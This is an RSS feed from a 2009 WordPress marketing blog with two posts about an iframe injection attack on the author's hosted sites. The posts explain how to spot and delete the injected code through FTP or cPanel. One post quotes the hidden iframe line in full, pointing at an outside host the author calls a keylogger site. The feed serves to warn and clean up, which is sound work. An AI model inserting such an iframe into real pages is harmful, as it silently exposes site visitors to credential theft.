<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sophie&#039;s Success Shortcuts &#187; Body Tag</title>
	<atom:link href="http://www.sophieslist.com/tag/body-tag/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.sophieslist.com</link>
	<description>Shortcuts and Recommendations for Marketers, Mindset, and More</description>
	<lastBuildDate>Thu, 21 Jan 2010 01:35:38 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.6</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>How did I remove the iframe the hackers put on my index pages</title>
		<link>http://www.sophieslist.com/2009/remove-iframe-hackers-index/</link>
		<comments>http://www.sophieslist.com/2009/remove-iframe-hackers-index/#comments</comments>
		<pubDate>Tue, 15 Sep 2009 15:53:21 +0000</pubDate>
		<dc:creator></dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[wordpress blog]]></category>
		<category><![CDATA[Blog]]></category>
		<category><![CDATA[Body Tag]]></category>
		<category><![CDATA[Body Tags]]></category>
		<category><![CDATA[Coaching]]></category>
		<category><![CDATA[Commonality]]></category>
		<category><![CDATA[Hackers]]></category>
		<category><![CDATA[Hackers Pages]]></category>
		<category><![CDATA[Havoc]]></category>
		<category><![CDATA[Html Files]]></category>
		<category><![CDATA[Iframe]]></category>
		<category><![CDATA[Iframes]]></category>
		<category><![CDATA[Index File]]></category>
		<category><![CDATA[Index Pages]]></category>
		<category><![CDATA[Index Php]]></category>
		<category><![CDATA[Interruption]]></category>
		<category><![CDATA[Lot]]></category>
		<category><![CDATA[Lt]]></category>
		<category><![CDATA[Manual Hacker]]></category>
		<category><![CDATA[Mindless Robot]]></category>
		<category><![CDATA[Php File]]></category>
		<category><![CDATA[Php Index]]></category>
		<category><![CDATA[Root Level]]></category>
		<category><![CDATA[Screen Shots]]></category>
		<category><![CDATA[Target]]></category>
		<category><![CDATA[Two Ways]]></category>

		<guid isPermaLink="false">http://www.sophieslist.com/2009/remove-iframe-hackers-put-index/</guid>
		<description><![CDATA[I am getting a lot of questions on how to remove the iframes that got hacked onto the index pages, whether index.php, index html, or default.html
It is actually relatively easy, and I&#8217;ll show you two methods, one with using ftp and the other using your file manager that comes with cpanel.
Hold on&#8230; I have a [...]]]></description>
			<content:encoded><![CDATA[<p>I am getting a lot of questions on how to remove the iframes that got hacked onto the index pages, whether index.php, index html, or default.html</p>
<p>It is actually relatively easy, and I&#8217;ll show you two methods, one with using ftp and the other using your file manager that comes with cpanel.</p>
<p>Hold on&#8230; I have a coaching client coming&#8230; I&#8217;ll be back later this afternoon to show you step-by-step with screen shots&#8230; check back this afternoon&#8230; sorry for the interruption&#8230; OK?</p>
<p>Sorry&#8230; I am back.</p>
<p>Life got suddenly very busy&#8230; my students are suddenly producing results&#8230; yaaay.</p>
<p>Anyway, here are two ways to recognize and remove the iframes from your index pages.</p>
<p>Method 1: ftp.</p>
<p>ftp into your your site&#8217;s root level and sort your documents by date.</p>
<p><img src="http://www.sophieslist.com/images/ftp-locate.png" alt="locate and remove iframe hack" title="How did I remove the iframe the hackers put on my index pages" /></p>
<p>you may notice that my index.php file was changed on September 5.</p>
<p>This is a blog, and you don&#8217;t change the index file&#8230; ever. so this must have been the hackers&#8217; target.</p>
<p>Now, from the result you&#8217;ll see that this wasn&#8217;t a manual hacker, it was a little mindless robot sent out the wreak havoc&#8230;</p>
<p><img src="http://www.sophieslist.com/images/healthy-index.png" alt="locate and remove iframe hack" title="How did I remove the iframe the hackers put on my index pages" /><br />
the above index.php file is the healthy file that comes with your wordpress blog installation. it starts with &lt;?php and ends with ?&gt;</p>
<p>that is how it should be.</p>
<p><img src="http://www.sophieslist.com/images/infected-index.png" alt="locate and remove iframe hack" title="How did I remove the iframe the hackers put on my index pages" /></p>
<p>on the above index.php file, please observe the last line. after the closing ?&gt; there is a whole line of code&#8230; that is the code you need to remove.</p>
<p><img src="http://www.sophieslist.com/images/infected-line.png" alt="locate and remove iframe hack" title="How did I remove the iframe the hackers put on my index pages" /></p>
<p>this is how the whole line looks&#8230; Save and upload your file and you are done.</p>
<p>The second category of files that got hacked are files that have body tags in them&#8230;  they can be both php or html files. the commonality is that they contain a body tag, that looks like this &lt;body&gt;</p>
<p>Sometimes after the &lt;body there is other code, and then it closes with a &gt; tag. It is still a starting body tag.</p>
<p><img src="http://www.sophieslist.com/images/healthy-index-html.png" alt="locate and remove iframe hack" title="How did I remove the iframe the hackers put on my index pages" /></p>
<p>this is (above) how a healthy file looks with body tag</p>
<p><img src="http://www.sophieslist.com/images/infected-index-html.png" alt="locate and remove iframe hack" title="How did I remove the iframe the hackers put on my index pages" /></p>
<p>this is (above) how an infected file looks with body tag</p>
<p>you need to delete the line that has the iframe tag &lt;iframe src..to &lt;iframe&gt;.</p>
<p>Third important thing: folder or directory dates also change when files change inside. So if you have subdirectories that have a newer date, please check the index files inside&#8230; I found 202 infected files, because my sites have many subdirectories.</p>
<p>Good luck, and please let me know how you are making out.<br />
Was this enough information? Please talk back to me.</p>
<p align="center"><img src="http://www.sophieslist.com/wp-content/plugins/call-to-action/images/three-short.png" title="How did I remove the iframe the hackers put on my index pages" alt="three short How did I remove the iframe the hackers put on my index pages" /></p>]]></content:encoded>
			<wfw:commentRss>http://www.sophieslist.com/2009/remove-iframe-hackers-index/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>All my sites on Hostgator got attacked by iframe hack</title>
		<link>http://www.sophieslist.com/2009/sites-hostgator-attacked-iframe/</link>
		<comments>http://www.sophieslist.com/2009/sites-hostgator-attacked-iframe/#comments</comments>
		<pubDate>Sun, 06 Sep 2009 03:57:13 +0000</pubDate>
		<dc:creator></dc:creator>
				<category><![CDATA[wordpress blog]]></category>
		<category><![CDATA[Blog]]></category>
		<category><![CDATA[Body Tag]]></category>
		<category><![CDATA[Code Lt]]></category>
		<category><![CDATA[Cpanel Login]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Hostgator]]></category>
		<category><![CDATA[Iframe]]></category>
		<category><![CDATA[iframe hack]]></category>
		<category><![CDATA[iframe to keylogging sites]]></category>
		<category><![CDATA[Index Files]]></category>
		<category><![CDATA[Index Html Files]]></category>
		<category><![CDATA[Index Php]]></category>
		<category><![CDATA[Italy]]></category>
		<category><![CDATA[Keylogger]]></category>
		<category><![CDATA[Passwords]]></category>
		<category><![CDATA[Russian Hackers]]></category>
		<category><![CDATA[Scripts]]></category>
		<category><![CDATA[Servers]]></category>
		<category><![CDATA[Tens Of Thousands]]></category>
		<category><![CDATA[Visibility]]></category>

		<guid isPermaLink="false">http://www.sophieslist.com/?p=181</guid>
		<description><![CDATA[At 7 pm tonight my students emailed me that our blog was down.
I checked immediately for an attack, and found that all the index.php and index.html files were altered an 18:46 EST, and a line of code was added either after the starting body tag or at the very end of the code
&#60;iframe src=&#8221;http://a6t.homeftp.net:8080/ts/in.cgi?open&#8221;  [...]]]></description>
			<content:encoded><![CDATA[<p><img class="left" src="http://www.sophieslist.com/iframe_hack.jpg" alt="iframe hack wordpress index files" title="All my sites on Hostgator got attacked by iframe hack" />At 7 pm tonight my students emailed me that our blog was down.</p>
<p>I checked immediately for an attack, and found that all the index.php and index.html files were altered an 18:46 EST, and a line of code was added either after the starting body tag or at the very end of the code</p>
<p>&lt;iframe src=&#8221;http://a6t.homeftp.net:8080/ts/in.cgi?open&#8221;  width=230 height=0 style=&#8221;visibility: hidden&#8221;&gt;&lt;/iframe&gt;</p>
<p>do not go there&#8230;</p>
<p>I googled the topic and found that some Russian hackers have created keylogger sites and the keylogger scripts get all your passwords.</p>
<p>If it is an individual site: your password was compromised.</p>
<p>I have sites on other servers, like this site, and none of those were attacked. I think it is Hostgator that is compromised&#8230; so if you have a site on hostgator, please check your index files&#8230; and clean them.</p>
<p>I hear in Italy tens of thousands of computers are infected&#8230; as a result of the iframe hack that effects every site, but especially wordpress blogs.</p>
<p><a href="http://forums.digitalpoint.com/showthread.php?t=901622" target="_blank">http://forums.digitalpoint.com/showthread.php?t=901622</a></p>
<p><a href="http://wordpress.org/support/topic/277277" target="_blank">http://wordpress.org/support/topic/277277</a></p>
<p>This time the database isn&#8217;t attacked, only the files. It seems that they get to the sites with ftp&#8230; if you can, please change your ftp and cpanel login. I am planning on removing my sites from hostgator.com</p>
<p align="center"><img src="http://www.sophieslist.com/wp-content/plugins/call-to-action/images/single.png" title="All my sites on Hostgator got attacked by iframe hack" alt="single All my sites on Hostgator got attacked by iframe hack" /></p>]]></content:encoded>
			<wfw:commentRss>http://www.sophieslist.com/2009/sites-hostgator-attacked-iframe/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
